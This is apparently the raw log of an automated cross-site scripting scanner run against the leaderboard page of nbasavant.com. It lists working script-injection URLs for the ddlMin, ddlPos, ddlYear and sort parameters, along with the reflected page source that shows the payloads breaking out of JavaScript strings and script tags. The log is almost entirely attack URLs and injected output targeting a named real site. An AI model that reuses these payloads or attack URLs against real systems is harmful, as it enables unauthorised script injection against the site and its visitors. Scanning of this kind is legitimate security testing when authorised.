http://nbasavant.com/leaderboard.php?ddlMin=500&ddlPos&ddlTeam&ddlYear=2014&sort=aaaaaaa

GET Params:[5]
['ddlMin', 'ddlPos', 'ddlTeam', 'ddlYear', 'sort']
_______________________________________________________________________________________________________
http://nbasavant.com/leaderboard.php?ddlMin=/uvw"xyz'yxz<zxy&ddlPos=&ddlTeam=&ddlYear=2014&sort=aaaaaaa

----------------------------------------------------------------------------------
Attribute Context: [0]

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [1]
<script>            
            $("#ddlMin").val('/uvw"xyz'yxz<zxy').attr('selected',true);
        </script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

	Script-Double ( 	Encapsulated With Single Quotes: Can't Break the Context
Mitigation        "	'	<	/ 
SCRIPT:		True	False	False	False

Attack Payloads for SCRIPT
["'; confirm`1`; '", '</script><script>alert`1`</script>']

SCRIPT Attack Url: http://nbasavant.com/leaderboard.php?ddlMin='; confirm`1`; '&ddlPos=&ddlTeam=&ddlYear=2014&sort=aaaaaaa

=>Detection  Successful with Payload: '; confirm`1`; '

FINAL OUTPUT: 
<script>            
            $("#ddlMin").val(''; confirm`1`; '').attr('selected',true);
        </script>

SCRIPT Attack Url: http://nbasavant.com/leaderboard.php?ddlMin=</script><script>alert`1`</script>&ddlPos=&ddlTeam=&ddlYear=2014&sort=aaaaaaa

=>Detection  Successful with Payload: </script><script>alert`1`</script>

FINAL OUTPUT: 
<script>            
            $("#ddlMin").val('</script><script>alert`1`</script>').attr('selected',true);
        </script>
_______________________________________________________________________________________________________
http://nbasavant.com/leaderboard.php?ddlMin=500&ddlPos=/uvw"xyz'yxz<zxy&ddlTeam=&ddlYear=2014&sort=aaaaaaa

----------------------------------------------------------------------------------
Attribute Context: [0]

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [2]
<script>            
            $("#ddlPos").val('/uvw"xyz'yxz<zxy').attr('selected',true);
        </script>
<script>
    var currentSort = 'aaaaaaa';
    $(document).ready(function(){
                $('#btnUpdate').click(function() {
           window.location = 'leaderboard.php?ddlYear=' + $('#ddlYear').val() + '&ddlMin=' + $('#ddlMin').val() + '&ddlTeam=' + $('#ddlTeam').val() +'&ddlPos=' + $('#ddlPos').val() + '&sort=' + currentSort; 
        });
        $('#btnClear').click(function() {
           window.location = 'leaderboard.php';            
        });        
        $('#link').click(function() {
           window.location = 'leaderboard.php?ddlYear=2014&ddlMin=500&ddlTeam=&ddlPos=/uvw"xyz'yxz<zxy&sort=' + currentSort;             
        });
    });
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

	Script-Double ( 	Encapsulated With Single Quotes: Can't Break the Context
Mitigation        "	'	<	/ 
SCRIPT:		True	False	False	False

Attack Payloads for SCRIPT
["'; confirm`1`; '", '</script><script>alert`1`</script>']

SCRIPT Attack Url: http://nbasavant.com/leaderboard.php?ddlMin=500&ddlPos='; confirm`1`; '&ddlTeam=&ddlYear=2014&sort=aaaaaaa

=>Detection  Successful with Payload: '; confirm`1`; '

FINAL OUTPUT: 
<script>            
            $("#ddlPos").val(''; confirm`1`; '').attr('selected',true);
        </script>
<script>
    var currentSort = 'aaaaaaa';
    $(document).ready(function(){
                $('#btnUpdate').click(function() {
           window.location = 'leaderboard.php?ddlYear=' + $('#ddlYear').val() + '&ddlMin=' + $('#ddlMin').val() + '&ddlTeam=' + $('#ddlTeam').val() +'&ddlPos=' + $('#ddlPos').val() + '&sort=' + currentSort; 
        });
        $('#btnClear').click(function() {
           window.location = 'leaderboard.php';            
        });        
        $('#link').click(function() {
           window.location = 'leaderboard.php?ddlYear=2014&ddlMin=500&ddlTeam=&ddlPos='; confirm`1`; '&sort=' + currentSort;             
        });
    });
</script>

SCRIPT Attack Url: http://nbasavant.com/leaderboard.php?ddlMin=500&ddlPos=</script><script>alert`1`</script>&ddlTeam=&ddlYear=2014&sort=aaaaaaa

=>Detection  Successful with Payload: </script><script>alert`1`</script>

FINAL OUTPUT: 
<script>            
            $("#ddlPos").val('</script><script>alert`1`</script>').attr('selected',true);
        </script>
<script>
    var currentSort = 'aaaaaaa';
    $(document).ready(function(){
                $('#btnUpdate').click(function() {
           window.location = 'leaderboard.php?ddlYear=' + $('#ddlYear').val() + '&ddlMin=' + $('#ddlMin').val() + '&ddlTeam=' + $('#ddlTeam').val() +'&ddlPos=' + $('#ddlPos').val() + '&sort=' + currentSort; 
        });
        $('#btnClear').click(function() {
           window.location = 'leaderboard.php';            
        });        
        $('#link').click(function() {
           window.location = 'leaderboard.php?ddlYear=2014&ddlMin=500&ddlTeam=&ddlPos=</script><script>alert`1`</script>&sort=' + currentSort;             
        });
    });
</script>
	Script-Double = 	Encapsulated With Single Quotes: Can't Break the Context
Mitigation        "	'	<	/ 
SCRIPT:		True	False	False	False

Attack Payloads for SCRIPT
["'; confirm`1`; '", '</script><script>alert`1`</script>']

SCRIPT Attack Url: http://nbasavant.com/leaderboard.php?ddlMin=500&ddlPos='; confirm`1`; '&ddlTeam=&ddlYear=2014&sort=aaaaaaa

=>Detection  Successful with Payload: '; confirm`1`; '

FINAL OUTPUT: 
<script>            
            $("#ddlPos").val(''; confirm`1`; '').attr('selected',true);
        </script>
<script>
    var currentSort = 'aaaaaaa';
    $(document).ready(function(){
                $('#btnUpdate').click(function() {
           window.location = 'leaderboard.php?ddlYear=' + $('#ddlYear').val() + '&ddlMin=' + $('#ddlMin').val() + '&ddlTeam=' + $('#ddlTeam').val() +'&ddlPos=' + $('#ddlPos').val() + '&sort=' + currentSort; 
        });
        $('#btnClear').click(function() {
           window.location = 'leaderboard.php';            
        });        
        $('#link').click(function() {
           window.location = 'leaderboard.php?ddlYear=2014&ddlMin=500&ddlTeam=&ddlPos='; confirm`1`; '&sort=' + currentSort;             
        });
    });
</script>

SCRIPT Attack Url: http://nbasavant.com/leaderboard.php?ddlMin=500&ddlPos=</script><script>alert`1`</script>&ddlTeam=&ddlYear=2014&sort=aaaaaaa

=>Detection  Successful with Payload: </script><script>alert`1`</script>

FINAL OUTPUT: 
<script>            
            $("#ddlPos").val('</script><script>alert`1`</script>').attr('selected',true);
        </script>
<script>
    var currentSort = 'aaaaaaa';
    $(document).ready(function(){
                $('#btnUpdate').click(function() {
           window.location = 'leaderboard.php?ddlYear=' + $('#ddlYear').val() + '&ddlMin=' + $('#ddlMin').val() + '&ddlTeam=' + $('#ddlTeam').val() +'&ddlPos=' + $('#ddlPos').val() + '&sort=' + currentSort; 
        });
        $('#btnClear').click(function() {
           window.location = 'leaderboard.php';            
        });        
        $('#link').click(function() {
           window.location = 'leaderboard.php?ddlYear=2014&ddlMin=500&ddlTeam=&ddlPos=</script><script>alert`1`</script>&sort=' + currentSort;             
        });
    });
</script>
_______________________________________________________________________________________________________
http://nbasavant.com/leaderboard.php?ddlMin=500&ddlPos=&ddlTeam=/uvw"xyz'yxz<zxy&ddlYear=2014&sort=aaaaaaa

----------------------------------------------------------------------------------
Attribute Context: [0]

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

_______________________________________________________________________________________________________
http://nbasavant.com/leaderboard.php?ddlMin=500&ddlPos=&ddlTeam=&ddlYear=/uvw"xyz'yxz<zxy&sort=aaaaaaa

----------------------------------------------------------------------------------
Attribute Context: [0]

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [1]
<script>            
            $("#ddlYear").val('/uvw"xyz'yxz<zxy').attr('selected',true);
        </script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

	Script-Double ( 	Encapsulated With Single Quotes: Can't Break the Context
Mitigation        "	'	<	/ 
SCRIPT:		True	False	False	False

Attack Payloads for SCRIPT
["'; confirm`1`; '", '</script><script>alert`1`</script>']

SCRIPT Attack Url: http://nbasavant.com/leaderboard.php?ddlMin=500&ddlPos=&ddlTeam=&ddlYear='; confirm`1`; '&sort=aaaaaaa

=>Detection  Successful with Payload: '; confirm`1`; '

FINAL OUTPUT: 
<script>            
            $("#ddlYear").val(''; confirm`1`; '').attr('selected',true);
        </script>

SCRIPT Attack Url: http://nbasavant.com/leaderboard.php?ddlMin=500&ddlPos=&ddlTeam=&ddlYear=</script><script>alert`1`</script>&sort=aaaaaaa

=>Detection  Successful with Payload: </script><script>alert`1`</script>

FINAL OUTPUT: 
<script>            
            $("#ddlYear").val('</script><script>alert`1`</script>').attr('selected',true);
        </script>
_______________________________________________________________________________________________________
http://nbasavant.com/leaderboard.php?ddlMin=500&ddlPos=&ddlTeam=&ddlYear=2014&sort=/uvw"xyz'yxz<zxy

----------------------------------------------------------------------------------
Attribute Context: [0]

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [1]
<script>
    var currentSort = '/uvw"xyz'yxz<zxy';
    $(document).ready(function(){
                    $.tablesorter.addWidget({
                id: "numbering",
                format: function(table) {
                    var c = table.config;
                    $("tr:visible", table.tBodies[0]).each(function(i) {
                        $(this).find('td').eq(0).text(i + 1);
                    });
                }
            });                
            $('#tblLeaderboard').tablesorter(
            {                    
                headers: {
                    0: { sorter: false }
                },
                sortList: [[/uvw"xyz'yxz<zxy]],
                // apply custom widget
                widgets: ['numbering']
            });
            
            $("#tblLeaderboard").bind("sortStart",function() { 
                $('.show_row').remove();
            }).bind("sortEnd",function() { 
                $('.show_row').remove();
            }).bind("sortEnd", function(sorter) {
                currentSort = sorter.target.config.sortList;
            });                    
                    
            $('.tablesorter tbody tr').mouseover(function() {
               $(this).addClass("over"); 
            }).mouseout(function()
            {
                $(this).removeClass("over");
            }
        );
                $('#btnUpdate').click(function() {
           window.location = 'leaderboard.php?ddlYear=' + $('#ddlYear').val() + '&ddlMin=' + $('#ddlMin').val() + '&ddlTeam=' + $('#ddlTeam').val() +'&ddlPos=' + $('#ddlPos').val() + '&sort=' + currentSort; 
        });
        $('#btnClear').click(function() {
           window.location = 'leaderboard.php';            
        });        
        $('#link').click(function() {
           window.location = 'leaderboard.php?ddlYear=2014&ddlMin=500&ddlTeam=&ddlPos=&sort=' + currentSort;             
        });
    });
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------

	Script-Double = 	Encapsulated With Single Quotes: Can't Break the Context
Mitigation        "	'	<	/ 
SCRIPT:		True	False	False	False

Attack Payloads for SCRIPT
["'; confirm`1`; '", '</script><script>alert`1`</script>']

SCRIPT Attack Url: http://nbasavant.com/leaderboard.php?ddlMin=500&ddlPos=&ddlTeam=&ddlYear=2014&sort='; confirm`1`; '

=>Detection  Successful with Payload: '; confirm`1`; '

FINAL OUTPUT: 
<script>
    var currentSort = ''; confirm`1`; '';
    $(document).ready(function(){
                    $.tablesorter.addWidget({
                id: "numbering",
                format: function(table) {
                    var c = table.config;
                    $("tr:visible", table.tBodies[0]).each(function(i) {
                        $(this).find('td').eq(0).text(i + 1);
                    });
                }
            });                
            $('#tblLeaderboard').tablesorter(
            {                    
                headers: {
                    0: { sorter: false }
                },
                sortList: [['; confirm`1`; ']],
                // apply custom widget
                widgets: ['numbering']
            });
            
            $("#tblLeaderboard").bind("sortStart",function() { 
                $('.show_row').remove();
            }).bind("sortEnd",function() { 
                $('.show_row').remove();
            }).bind("sortEnd", function(sorter) {
                currentSort = sorter.target.config.sortList;
            });                    
                    
            $('.tablesorter tbody tr').mouseover(function() {
               $(this).addClass("over"); 
            }).mouseout(function()
            {
                $(this).removeClass("over");
            }
        );
                $('#btnUpdate').click(function() {
           window.location = 'leaderboard.php?ddlYear=' + $('#ddlYear').val() + '&ddlMin=' + $('#ddlMin').val() + '&ddlTeam=' + $('#ddlTeam').val() +'&ddlPos=' + $('#ddlPos').val() + '&sort=' + currentSort; 
        });
        $('#btnClear').click(function() {
           window.location = 'leaderboard.php';            
        });        
        $('#link').click(function() {
           window.location = 'leaderboard.php?ddlYear=2014&ddlMin=500&ddlTeam=&ddlPos=&sort=' + currentSort;             
        });
    });
</script>

SCRIPT Attack Url: http://nbasavant.com/leaderboard.php?ddlMin=500&ddlPos=&ddlTeam=&ddlYear=2014&sort=</script><script>alert`1`</script>

=>Detection  Successful with Payload: </script><script>alert`1`</script>

FINAL OUTPUT: 
<script>
    var currentSort = '</script><script>alert`1`</script>';
    $(document).ready(function(){
                    $.tablesorter.addWidget({
                id: "numbering",
                format: function(table) {
                    var c = table.config;
                    $("tr:visible", table.tBodies[0]).each(function(i) {
                        $(this).find('td').eq(0).text(i + 1);
                    });
                }
            });                
            $('#tblLeaderboard').tablesorter(
            {                    
                headers: {
                    0: { sorter: false }
                },
                sortList: [[</script>
